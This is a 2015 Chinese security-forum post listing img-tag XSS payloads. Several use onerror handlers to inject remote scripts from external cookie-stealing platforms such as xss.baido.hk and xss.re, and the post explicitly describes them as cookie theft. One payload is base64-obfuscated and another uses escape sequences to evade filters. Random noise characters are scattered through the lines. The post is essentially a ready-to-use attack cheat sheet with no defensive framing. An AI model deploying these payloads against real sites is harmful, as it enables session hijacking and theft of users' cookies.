找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1981|回复: 0

img标签的常用几种测试手段

[复制链接]
发表于 2015-10-18 14:33:54 | 显示全部楼层 |阅读模式
<img src='non-exist.jpg'onerror="alert('xss')">; |2 {4 e0 e/ S) O& \
<img src=# onerror=alert(123)>& m8 y0 f4 ?2 F6 K: p/ Z' S( Z9 f, x- w
<img src=# onerror=alert(document.cookie)>$ S) h3 Q! C7 G& P1 S
下面是利用平台钓cookie的
" L. l, p9 h# l) P, a# Z <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>" S& V1 a1 l+ G$ f

9 L( @7 h! C' x: L* H4 [+ j9 L' I" r2 ]
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>2 r, q+ O) M3 `1 v
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
/ t$ u; S4 n* I! A! Y“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img># p: a8 O' C; A
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
/ y6 o/ n  `: q% C* I9 ?<img src="#">! ?: E+ C/ B6 k0 o2 J! F. [
<img src="#"># ]) k+ O4 _/ Z
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>! O0 a  U) Q& K; X8 E* g
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">) A6 d; a1 p+ l! N9 p6 W
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
" l1 r# f3 b7 W* C" ~: p% {( ?<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>1 v! ^: o0 Z9 \; X
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>0 i" t& Y7 B8 r
<img src=x width="0" height="0"></img>( ^. w4 V" [/ f) z$ u
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
; ?- G1 U8 p3 Z1 u  [<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>8 t* y! ]% d( @& X9 M( l& a# e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表